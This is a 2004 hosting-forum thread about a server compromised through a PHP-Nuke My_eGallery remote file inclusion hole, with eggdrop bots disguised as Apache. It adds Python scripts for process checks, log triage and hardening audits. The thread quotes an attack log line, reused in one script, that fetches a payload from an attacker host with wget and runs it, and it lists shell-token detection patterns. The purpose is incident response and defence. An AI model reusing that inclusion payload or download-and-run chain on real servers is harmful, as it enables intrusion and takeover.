joseph
Apr 25 2004, 07:41 AM
10165 (eggdrop) /tmp/.shp/.dat/eggdrop-1.6. /tmp/.shp/.dat
/usr/local/apache/sbin/httpd-DSSL
-m bin.txt
--------------------------------------------------------------------------------
10336 (eggdrop) /tmp/.sho/.dat/eggdrop-1.6. /tmp/.sho/.dat
/usr/local/apache/sbin/httpd-DSSL
-m bin.txt
What are those? Am I hacked?
In my tmp,
drwxr-xr-x 3 nobody nobody 4096 Apr 21 22:54 .shc/
drwxr-xr-x 3 nobody nobody 4096 Apr 17 19:00 .shh/
drwxr-xr-x 3 nobody nobody 4096 Apr 24 08:37 .sho/
drwxr-xr-x 3 nobody nobody 4096 Apr 24 08:35 .shp/
drwxr-xr-x 3 nobody nobody 4096 Apr 21 22:56 .shw/
drwxr-xr-x 3 nobody nobody 4096 Apr 17 18:55 .ssh/
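Added example (not part of joseph's post or anyone else's in this thread): a small Python script that applies the check the listing above calls for. The kernel's own view of a process (the task name in /proc/PID/comm and the link target of /proc/PID/exe) cannot be rewritten through argv, while argv[0] can, so a process that advertises /usr/local/apache/sbin/httpd-DSSL but executes from /tmp/.shp/.dat stands out immediately. The sample records are constructed from the listing; the eggdrop path in them is illustrative, not the truncated one shown above.

```python
"""Spot processes whose argv[0] claims one binary while the kernel says
another, which is the httpd-DSSL / eggdrop pattern in the listing above.

Added example, not from the original thread. The classification is a pure
function so it can be exercised on constructed records; scan_proc() applies
it to the live /proc (Linux; run as root to read other users' exe links).
"""
import os

# Writable scratch locations a web-server child should never execute from.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def classify(comm, exe, argv0):
    """Return the reasons a process looks like a masquerade ([] if none).

    comm  - kernel task name (/proc/PID/comm), set from the executable's
            filename at exec time; it can be changed, but most bots do not
            bother, which is why the listing above still says eggdrop
    exe   - readlink(/proc/PID/exe), the file actually mapped as the program
    argv0 - first element of /proc/PID/cmdline, fully under the program's control
    """
    reasons = []
    exe_base = os.path.basename(exe)
    argv_base = os.path.basename(argv0)
    # comm is truncated to 15 bytes by the kernel, so compare on that prefix.
    if comm and not exe_base.startswith(comm[:15]):
        reasons.append("comm %r does not match exe %r" % (comm, exe))
    # Tolerate interpreter-style differences (python3 vs python3.11); flag the rest.
    if not (argv_base.startswith(exe_base) or exe_base.startswith(argv_base)):
        reasons.append("argv[0] %r does not match exe %r" % (argv0, exe))
    if exe.startswith(SCRATCH_DIRS):
        reasons.append("executable lives in scratch space: %s" % exe)
    if "/." in exe:
        reasons.append("executable path contains a hidden directory: %s" % exe)
    if exe.endswith(" (deleted)"):
        reasons.append("executable was unlinked after start: %s" % exe)
    return reasons


def read_proc_record(pid):
    """Collect (comm, exe, argv0) for one PID; None if it vanished or is unreadable."""
    try:
        with open("/proc/%d/comm" % pid) as f:
            comm = f.read().strip()
        exe = os.readlink("/proc/%d/exe" % pid)      # fails for kernel threads
        with open("/proc/%d/cmdline" % pid, "rb") as f:
            argv = f.read().split(b"\0")
    except OSError:
        return None
    argv0 = argv[0].decode("utf-8", "replace") if argv and argv[0] else ""
    return comm, exe, argv0


def scan_proc():
    """Walk /proc and return {pid: reasons} for every suspicious process."""
    findings = {}
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        rec = read_proc_record(int(name))
        if rec is None:
            continue
        reasons = classify(*rec)
        if reasons:
            findings[int(name)] = reasons
    return findings


# Constructed records modelled on the listing above (paths are illustrative):
# the masquerading bot, and a genuine apache worker as a control.
SAMPLE = {
    10165: ("eggdrop", "/tmp/.shp/.dat/eggdrop", "/usr/local/apache/sbin/httpd-DSSL"),
    4021: ("httpd-DSSL", "/usr/local/apache/sbin/httpd-DSSL",
           "/usr/local/apache/sbin/httpd-DSSL"),
}

if __name__ == "__main__":
    for pid, rec in SAMPLE.items():
        print(pid, classify(*rec) or "ok")
    for pid, reasons in scan_proc().items():
        print(pid, reasons)
```

The (deleted) case matters in practice: bots often unlink their binary once it is running so that nothing is left on disk to inspect, and the exe link is then the only copy you can still read (cp /proc/PID/exe somewhere safe before killing it).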
madsere
Apr 25 2004, 08:01 AM
It certainly looks like you've been hacked.
What does "ls -alR /tmp" produce?
joseph
Apr 25 2004, 08:28 AM
drwxr-xr-x 3 nobody nobody 4096 Apr 21 22:54 .shc/
drwxr-xr-x 3 nobody nobody 4096 Apr 17 19:00 .shh/
drwxr-xr-x 3 nobody nobody 4096 Apr 24 08:37 .sho/
drwxr-xr-x 3 nobody nobody 4096 Apr 24 08:35 .shp/
drwxr-xr-x 3 nobody nobody 4096 Apr 21 22:56 .shw/
drwxr-xr-x 3 nobody nobody 4096 Apr 17 18:55 .ssh/
These are the directories the hacker created.
I believe he hacked via OpenSSL.
I do not know how he did it, since I always keep the server updated with the latest patches, be it cPanel, kernel, etc.
madsere
Apr 25 2004, 09:57 AM
Please try "ls -alR" - include the "R" - there surely must be something in all those directories.
joseph
Apr 25 2004, 10:31 PM
Yes, there are directories in it. From one look, the hacker installed eggdrop and BNC.
I have deleted them all.
I am wondering how they managed to create and put those programs into /tmp.
BeerHandle
Apr 27 2004, 08:13 AM
It would help if you told us what kind of services you're running on your web server, whether you are a webhost, etc., and settings like PHP safe mode, open_basedir, etc.
dynamicnet
Apr 27 2004, 08:30 AM
Greetings:
Are your compilers and fetch programs (wget, lynx, et al.) set up with root-only access?
Do you have your tmp directory in its own partition with /var/tmp and /usr/tmp linked to /tmp? Is it set up to have noexec, nosuid?
Are you running the latest kernel?
Is your web server patched up to date?
Are you running tripwire?
Do you have LibSafe installed?
Do you have a firewall installed? Is it managed?
Do you have any intrusion detection systems in place? Are they managed?
Thank you.
mcnightmare
Apr 27 2004, 09:15 AM
Scan your box to check if you have a rootkit installed!
How to install chkrootkit HERE
Did you disable direct root login?
Is your password easy to find?
Change all your passwords to passwords mixed with numbers and letters,
example: mN7R5tZa
Password Generator
joseph
Apr 28 2004, 02:29 AM
Apparently, someone uploaded those eggdrop programs to /tmp through a vulnerable script.
To fix it,
Change your permissions for /tmp to non-executable.
If you are using cpanel, do the following command to secure your tmp.
/scripts/updatenow
/scripts/securetmp
If any of your websites running on MySQL report a mysql.sock error, try killing all MySQL processes and restarting MySQL.
joseph
May 11 2004, 04:44 AM
Latest update: I finally traced down where the insecure script is.
There's a security hole in the module "My_eGallery" for PHP-Nuke.
Here's the log:
domain1.com:202.155.82.190 - - [11/May/2004:14:09:23 +0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/irclordz/inject.txt?&cmd=uname%20-a%20;%20id%20;%20cd%20/tmp%20;%20mkdir%20bin%20;%20cd%20bin%20;%20wget%20freewebs.com/irclordz/httpd%20;%20chmod%20755%20httpd%20;%20./httpd HTTP/1.0" 200 1668 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
All users should search for the file called "displayCategory.php".
Please check if your clients are using the My_eGallery module.
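Added example (not part of joseph's post): a Python triage script for access logs that flags requests like the one quoted above. The line shows a classic remote file inclusion: basepath is pointed at a URL on a host the attacker controls, the trailing ? after inject.txt turns whatever the script appends to $basepath into a harmless query string so the include still fetches inject.txt, and the included file reads cmd and runs it, which is where the wget/chmod/./httpd chain comes from. The 200 with 1668 bytes means the server answered normally rather than rejecting the request. The first entry in SAMPLE_LOG is the quoted line itself; the second is a constructed benign request used as a control. The shell-token list is a heuristic and is named as such.

```python
"""Triage Apache access-log lines for remote-file-inclusion attempts like
the displayCategory.php request quoted above.

Added example, not from the original post. QUOTED_LINE is the line from the
thread; BENIGN_LINE is constructed as a control.
"""
import re
from urllib.parse import urlsplit, unquote_plus

# Combined log format, optionally prefixed with "vhost:" as in the quoted
# line. (Client IPv6 addresses would need a different split.)
LOG_RE = re.compile(
    r'^(?:(?P<vhost>[^\s:]+):)?(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# Heuristic: tokens that only make sense if the parameter ends up in a shell.
SHELL_TOKENS = ("wget ", "curl ", "lynx ", "fetch ", "chmod ", "uname", "cd /tmp", ";")


def parse_query(query):
    """Split a raw query on '&' only (never ';', which is part of the payload
    here) and percent-decode both sides."""
    params = []
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        params.append((unquote_plus(key), unquote_plus(value)))
    return params


def parse(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["params"] = parse_query(url.query)
    return rec


def analyse(line):
    """parse() plus findings: remote URLs in parameters and shell-looking values."""
    rec = parse(line)
    if rec is None:
        return None
    findings, commands = [], []
    for key, value in rec["params"]:
        if REMOTE_URL.match(value):
            findings.append("%s= points at a remote file: %s" % (key, value))
        hits = [t for t in SHELL_TOKENS if t in value]
        if hits:
            findings.append("%s= looks like a shell command line (%s)"
                            % (key, ", ".join(repr(h) for h in hits)))
            commands += [c.strip() for c in value.split(";") if c.strip()]
    rec["findings"] = findings
    rec["commands"] = commands
    return rec


def scan(lines):
    """Return only the records that produced findings."""
    out = []
    for line in lines:
        rec = analyse(line)
        if rec and rec["findings"]:
            out.append(rec)
    return out


QUOTED_LINE = (
    'domain1.com:202.155.82.190 - - [11/May/2004:14:09:23 +0800] '
    '"GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/irclordz/inject.txt?'
    '&cmd=uname%20-a%20;%20id%20;%20cd%20/tmp%20;%20mkdir%20bin%20;%20cd%20bin%20;'
    '%20wget%20freewebs.com/irclordz/httpd%20;%20chmod%20755%20httpd%20;%20./httpd HTTP/1.0" '
    '200 1668 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"')
# Constructed control: the same script called the way the module intends.
BENIGN_LINE = (
    'domain1.com:10.0.0.5 - - [11/May/2004:14:10:02 +0800] '
    '"GET /modules/My_eGallery/public/displayCategory.php?cat=3 HTTP/1.0" 200 5120 "-" "Mozilla/4.0"')
SAMPLE_LOG = [QUOTED_LINE, BENIGN_LINE]

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], rec["path"], rec["status"])
        for f in rec["findings"]:
            print("  ", f)
        for c in rec["commands"]:
            print("   $", c)
```

Run it over the whole access log (scan(open(path))) and grep the output for remote-file findings first; the decoded command list tells you what to look for on disk (here a bin directory under /tmp and a downloaded file named httpd), and every source IP that produced a finding belongs in the firewall and the abuse report.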
TheLinuxGuy
May 17 2004, 10:31 PM
I've seen this before; they made the eggdrop look like it was Apache. lsof showed the suspected Apache process was an eggdrop. Things that can help prevent this type of attack:
chmod 700 /usr/bin/wget
add to php.ini:
disable_functions = system, exec, shell_exec
noexec,nosuid = /tmp /var/tmp
make sure you are always running an updated kernel.
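Added example (not from any post in this thread): a Python audit that checks the three hardening points raised by dynamicnet, by joseph's securetmp post and by the list just above. Two caveats a practitioner would add: "noexec,nosuid = /tmp /var/tmp" is really the mount option list in /etc/fstab (and /proc/mounts is where you verify it took effect), and chmod 700 /usr/bin/wget only stops the copy-and-paste attacker, since perl, php and python on the same box can download a file just as well. The disable_functions check also asks for passthru, popen, proc_open and pcntl_exec, which spawn processes as readily as system/exec/shell_exec (backticks go through shell_exec, so that one covers them). Each check takes its input as an argument so it runs on the constructed samples; audit_host() feeds it the live files.

```python
"""Audit the hardening points raised in this thread: scratch directories
mounted noexec/nosuid, fetch tools and compilers not runnable by the web
user, and php.ini disable_functions covering the command-execution calls.

Added example, not from any post above. Each check takes its input as an
argument so it can be run on constructed data; audit_host() feeds it the
live files. The sample inputs at the bottom are constructed.
"""
import os
import stat

SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
WANT_MOUNT_OPTS = {"noexec", "nosuid", "nodev"}
# system/exec/shell_exec from the post above, plus the other PHP calls that
# spawn a process; backticks map to shell_exec, so disabling it covers them.
WANT_DISABLED = {"system", "exec", "shell_exec", "passthru", "popen",
                 "proc_open", "pcntl_exec"}
FETCH_AND_BUILD = ("/usr/bin/wget", "/usr/bin/curl", "/usr/bin/lynx",
                   "/usr/bin/fetch", "/usr/bin/gcc", "/usr/bin/cc",
                   "/usr/bin/g++", "/usr/bin/ld")


def audit_mounts(proc_mounts_text, resolve=lambda p: p):
    """Return {scratch dir: problem}. 'resolve' maps a directory to its real
    path so a /var/tmp -> /tmp symlink is credited with /tmp's options."""
    opts_by_mount = {}
    for line in proc_mounts_text.splitlines():
        fields = line.split()               # device mountpoint fstype options ...
        if len(fields) >= 4:
            opts_by_mount[fields[1]] = set(fields[3].split(","))
    report = {}
    for d in SCRATCH_DIRS:
        real = resolve(d)
        if real not in opts_by_mount:
            report[d] = "not a separate mount (inherits the options of its parent)"
            continue
        missing = sorted(WANT_MOUNT_OPTS - opts_by_mount[real])
        if missing:
            report[d] = "missing " + ",".join(missing)
    return report


def audit_binary_mode(path, st_mode):
    """Return a problem string if group or other can execute the file, else None."""
    if st_mode & (stat.S_IXGRP | stat.S_IXOTH):
        return "%s is executable by group/other (mode %04o)" % (path, stat.S_IMODE(st_mode))
    return None


def audit_php_ini(ini_text):
    """Return the execution functions that php.ini leaves enabled."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()          # ';' starts an ini comment
        if not line.startswith("disable_functions"):
            continue
        _, _, value = line.partition("=")
        for name in value.strip().strip('"').split(","):
            if name.strip():
                disabled.add(name.strip().lower())
    return sorted(WANT_DISABLED - disabled)


def audit_host():
    """Run all three checks against this machine (Linux); returns a list of findings."""
    findings = []
    with open("/proc/mounts") as f:
        for d, problem in audit_mounts(f.read(), os.path.realpath).items():
            findings.append("%s: %s" % (d, problem))
    for path in FETCH_AND_BUILD:
        try:
            problem = audit_binary_mode(path, os.stat(path).st_mode)
        except OSError:
            continue                                  # not installed
        if problem:
            findings.append(problem)
    for ini in ("/usr/local/lib/php.ini", "/etc/php.ini"):   # assumed locations
        if os.path.exists(ini):
            with open(ini) as f:
                left = audit_php_ini(f.read())
            if left:
                findings.append("%s leaves enabled: %s" % (ini, ", ".join(left)))
            break
    return findings


# Constructed samples: /tmp is its own mount but only nosuid, /var/tmp is a
# plain directory, and php.ini carries exactly the line suggested above.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
/dev/sda5 /tmp ext3 rw,nosuid 0 0
tmpfs /dev/shm tmpfs rw 0 0
"""
SAMPLE_PHP_INI = """\
; constructed fragment
safe_mode = Off
disable_functions = system, exec, shell_exec
"""

if __name__ == "__main__":
    print(audit_mounts(SAMPLE_MOUNTS))
    print(audit_php_ini(SAMPLE_PHP_INI))
    print(audit_binary_mode("/usr/bin/wget", 0o100755))
    print(audit_host())
```

Note that noexec on /tmp raises the bar but does not end the game: a bot that is started as an argument to an interpreter (perl /tmp/.x/bot) never needs the execute bit, which is why the php.ini and process checks belong alongside the mount check rather than instead of it.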